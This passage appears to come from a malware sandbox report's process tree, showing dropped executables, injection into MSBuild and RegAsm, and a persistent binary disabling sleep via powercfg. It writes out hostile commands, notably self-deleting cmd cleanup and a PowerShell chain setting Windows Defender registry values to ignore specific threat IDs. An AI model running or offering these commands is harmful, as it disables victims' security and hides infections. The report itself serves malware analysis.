                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,7113396949860208705,8731049698339891128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
                                                                          7⤵
                                                                            PID:6320
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,7113396949860208705,8731049698339891128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
                                                                            7⤵
                                                                              PID:6384
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,7113396949860208705,8731049698339891128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:1
                                                                              7⤵
                                                                                PID:4656
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
                                                                              6⤵
                                                                                PID:5208
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
                                                                                  7⤵
                                                                                    PID:3304
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3304.0.46596513\1042497105" -parentBuildID 20230214051806 -prefsHandle 1632 -prefMapHandle 1676 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0795cac3-af11-45fb-972e-3178ccc90e48} 3304 "\\.\pipe\gecko-crash-server-pipe.3304" 1868 1f0fff0d758 gpu
                                                                                      8⤵
                                                                                        PID:5712
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3304.1.1436908097\1760350087" -parentBuildID 20230214051806 -prefsHandle 2476 -prefMapHandle 2472 -prefsLen 22927 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3cda5308-c7e9-48e3-945d-3428a56be944} 3304 "\\.\pipe\gecko-crash-server-pipe.3304" 2496 1f084b8f458 socket
                                                                                        8⤵
                                                                                          PID:5072
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3304.2.1028217505\1475732146" -childID 1 -isForBrowser -prefsHandle 2976 -prefMapHandle 2940 -prefsLen 22965 -prefMapSize 235121 -jsInitHandle 928 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae4ea527-15b5-4cf1-ad2b-b10d3d7740ce} 3304 "\\.\pipe\gecko-crash-server-pipe.3304" 876 1f086d23358 tab
                                                                                          8⤵
                                                                                            PID:1384
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3304.3.17466487\1182604668" -childID 2 -isForBrowser -prefsHandle 3628 -prefMapHandle 3624 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 928 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38fd490f-a216-4636-a9ba-499b4ee19119} 3304 "\\.\pipe\gecko-crash-server-pipe.3304" 3636 1f08915af58 tab
                                                                                            8⤵
                                                                                              PID:6564
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3304.4.1544314452\2111182746" -childID 3 -isForBrowser -prefsHandle 5272 -prefMapHandle 5268 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 928 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7147787c-700d-4d45-bfc7-b1f9058b9cd3} 3304 "\\.\pipe\gecko-crash-server-pipe.3304" 5188 1f08b363158 tab
                                                                                              8⤵
                                                                                                PID:7352
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3304.5.175528244\1041578542" -childID 4 -isForBrowser -prefsHandle 5388 -prefMapHandle 5384 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 928 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {454bd5e7-cadc-4b1d-baf8-3ebdba890a7b} 3304 "\\.\pipe\gecko-crash-server-pipe.3304" 5432 1f08b362b58 tab
                                                                                                8⤵
                                                                                                  PID:7360
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3304.6.1929070194\201118717" -childID 5 -isForBrowser -prefsHandle 5680 -prefMapHandle 5676 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 928 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {96c3eb34-4897-46d5-bfb2-140d6c62fe71} 3304 "\\.\pipe\gecko-crash-server-pipe.3304" 5692 1f08a945158 tab
                                                                                                  8⤵
                                                                                                    PID:7372
                                                                                          • C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1480
                                                                                          • C:\Users\Admin\AppData\Local\Temp\1000021001\e933fe72f9.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\1000021001\e933fe72f9.exe"
                                                                                            4⤵
                                                                                              PID:5028
                                                                                        • C:\Users\Admin\Documents\SimpleAdobe\1mwC9JJ9PRw2t4X5BfhO3TV5.exe
                                                                                          C:\Users\Admin\Documents\SimpleAdobe\1mwC9JJ9PRw2t4X5BfhO3TV5.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1368
                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                            3⤵
                                                                                            • Checks processor information in registry
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:5176
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FHJDBKJKFIEC" & exit
                                                                                              4⤵
                                                                                                PID:8016
                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                  timeout /t 10
                                                                                                  5⤵
                                                                                                  • Delays execution with timeout.exe
                                                                                                  PID:3680
                                                                                          • C:\Users\Admin\Documents\SimpleAdobe\60fXr1fpIbRtEKeXBaxr893u.exe
                                                                                            C:\Users\Admin\Documents\SimpleAdobe\60fXr1fpIbRtEKeXBaxr893u.exe
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:2156
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                              3⤵
                                                                                                PID:5448
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                3⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:5476
                                                                                            • C:\Users\Admin\Documents\SimpleAdobe\5pYhbSUnUcsBRD4HUfjlVvqx.exe
                                                                                              C:\Users\Admin\Documents\SimpleAdobe\5pYhbSUnUcsBRD4HUfjlVvqx.exe
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:5108
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                3⤵
                                                                                                  PID:2152
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                  3⤵
                                                                                                    PID:5196
                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                    3⤵
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:5240
                                                                                                    • C:\ProgramData\GCBGCAFIIE.exe
                                                                                                      "C:\ProgramData\GCBGCAFIIE.exe"
                                                                                                      4⤵
                                                                                                        PID:812
                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                          5⤵
                                                                                                            PID:7500
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 7500 -s 500
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:7808
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 7500 -s 500
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:6488
                                                                                                        • C:\ProgramData\FCBAECGIEB.exe
                                                                                                          "C:\ProgramData\FCBAECGIEB.exe"
                                                                                                          4⤵
                                                                                                            PID:2264
                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                              5⤵
                                                                                                                PID:7496
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FBKJKEHIJECG" & exit
                                                                                                              4⤵
                                                                                                                PID:5828
                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                  timeout /t 10
                                                                                                                  5⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:5616
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                          1⤵
                                                                                                            PID:2988
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                            1⤵
                                                                                                              PID:1796
                                                                                                            • C:\Windows\system32\taskmgr.exe
                                                                                                              "C:\Windows\system32\taskmgr.exe" /4
                                                                                                              1⤵
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                              PID:2748
                                                                                                            • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                                                                                              1⤵
                                                                                                                PID:6420
                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:6872
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                                                  1⤵
                                                                                                                    PID:6984
                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:6312
                                                                                                                    • C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
                                                                                                                      C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
                                                                                                                      1⤵
                                                                                                                        PID:7416
                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                          2⤵
                                                                                                                          • Power Settings
                                                                                                                          PID:7496
                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                          2⤵
                                                                                                                          • Power Settings
                                                                                                                          PID:7488
                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                          2⤵
                                                                                                                          • Power Settings
                                                                                                                          PID:7528
                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                          2⤵
                                                                                                                          • Power Settings
                                                                                                                          PID:7536
                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                          C:\Windows\system32\conhost.exe
                                                                                                                          2⤵
                                                                                                                            PID:7544
                                                                                                                            • C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
                                                                                                                              "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
                                                                                                                              3⤵
                                                                                                                                PID:5668
                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                  4⤵
                                                                                                                                  • Power Settings
                                                                                                                                  PID:6912
                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                  4⤵
                                                                                                                                  • Power Settings
                                                                                                                                  PID:1676
                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                  4⤵
                                                                                                                                  • Power Settings
                                                                                                                                  PID:2348
                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                  4⤵
                                                                                                                                  • Power Settings
                                                                                                                                  PID:3628
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  svchost.exe
                                                                                                                                  4⤵
                                                                                                                                    PID:4572
                                                                                                                                • C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
                                                                                                                                  "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
                                                                                                                                  3⤵
                                                                                                                                    PID:1912
                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                      4⤵
                                                                                                                                      • Power Settings
                                                                                                                                      PID:6916
                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                      4⤵
                                                                                                                                      • Power Settings
                                                                                                                                      PID:2332
                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                      4⤵
                                                                                                                                      • Power Settings
                                                                                                                                      PID:6168
                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                      4⤵
                                                                                                                                      • Power Settings
                                                                                                                                      PID:3804
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      svchost.exe
                                                                                                                                      4⤵
                                                                                                                                        PID:4488
                                                                                                                                    • C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
                                                                                                                                      "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
                                                                                                                                      3⤵
                                                                                                                                        PID:6744
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                          4⤵
                                                                                                                                          • Power Settings
                                                                                                                                          PID:6204
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                          4⤵
                                                                                                                                          • Power Settings
                                                                                                                                          PID:6216
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                          4⤵
                                                                                                                                          • Power Settings
                                                                                                                                          PID:6232
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                          4⤵
                                                                                                                                          • Power Settings
                                                                                                                                          PID:6972
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          svchost.exe
                                                                                                                                          4⤵
                                                                                                                                            PID:6948
                                                                                                                                        • C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
                                                                                                                                          "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
                                                                                                                                          3⤵
                                                                                                                                            PID:6904
                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                              4⤵
                                                                                                                                              • Power Settings
                                                                                                                                              PID:6896
                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                              4⤵
                                                                                                                                              • Power Settings
                                                                                                                                              PID:6704
                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                              4⤵
                                                                                                                                              • Power Settings
                                                                                                                                              PID:2812
                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                              4⤵
                                                                                                                                              • Power Settings
                                                                                                                                              PID:4740
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              svchost.exe
                                                                                                                                              4⤵
                                                                                                                                                PID:1020
                                                                                                                                            • C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
                                                                                                                                              "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
                                                                                                                                              3⤵
                                                                                                                                                PID:6788
                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                  4⤵
                                                                                                                                                  • Power Settings
                                                                                                                                                  PID:7096
                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                  4⤵
                                                                                                                                                  • Power Settings
                                                                                                                                                  PID:7180
                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                  4⤵
                                                                                                                                                  • Power Settings
                                                                                                                                                  PID:6868
                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                  4⤵
                                                                                                                                                  • Power Settings
                                                                                                                                                  PID:7288
                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                  svchost.exe
                                                                                                                                                  4⤵
                                                                                                                                                    PID:7160
                                                                                                                                                • C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
                                                                                                                                                  "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:7056
                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                      4⤵
                                                                                                                                                      • Power Settings
                                                                                                                                                      PID:7316
                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                      4⤵
                                                                                                                                                      • Power Settings
                                                                                                                                                      PID:7120
                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                      4⤵
                                                                                                                                                      • Power Settings
                                                                                                                                                      PID:4508
                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                      4⤵
                                                                                                                                                      • Power Settings
                                                                                                                                                      PID:7492
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      svchost.exe
                                                                                                                                                      4⤵
                                                                                                                                                        PID:3348
                                                                                                                                                    • C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
                                                                                                                                                      "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:8000
                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                          4⤵
                                                                                                                                                          • Power Settings
                                                                                                                                                          PID:444
                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                          4⤵
                                                                                                                                                          • Power Settings
                                                                                                                                                          PID:1344
                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                          4⤵
                                                                                                                                                          • Power Settings
                                                                                                                                                          PID:1740
                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                          4⤵
                                                                                                                                                          • Power Settings
                                                                                                                                                          PID:316
                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                          svchost.exe
                                                                                                                                                          4⤵
                                                                                                                                                            PID:5792
                                                                                                                                                        • C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
                                                                                                                                                          "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:6420
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                              4⤵
                                                                                                                                                              • Power Settings
                                                                                                                                                              PID:1556
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                              4⤵
                                                                                                                                                              • Power Settings
                                                                                                                                                              PID:7064
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                              4⤵
                                                                                                                                                              • Power Settings
                                                                                                                                                              PID:5712
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                              4⤵
                                                                                                                                                              • Power Settings
                                                                                                                                                              PID:5784
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              svchost.exe
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4800
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            svchost.exe
                                                                                                                                                            2⤵
                                                                                                                                                              PID:7852
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 7500 -ip 7500
                                                                                                                                                            1⤵
                                                                                                                                                              PID:7648
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7500 -ip 7500
                                                                                                                                                              1⤵
                                                                                                                                                                PID:408
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8CA6.tmp\Install.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7zS8CA6.tmp\Install.exe Nz /gpdidL 385132 /S
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:6044
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 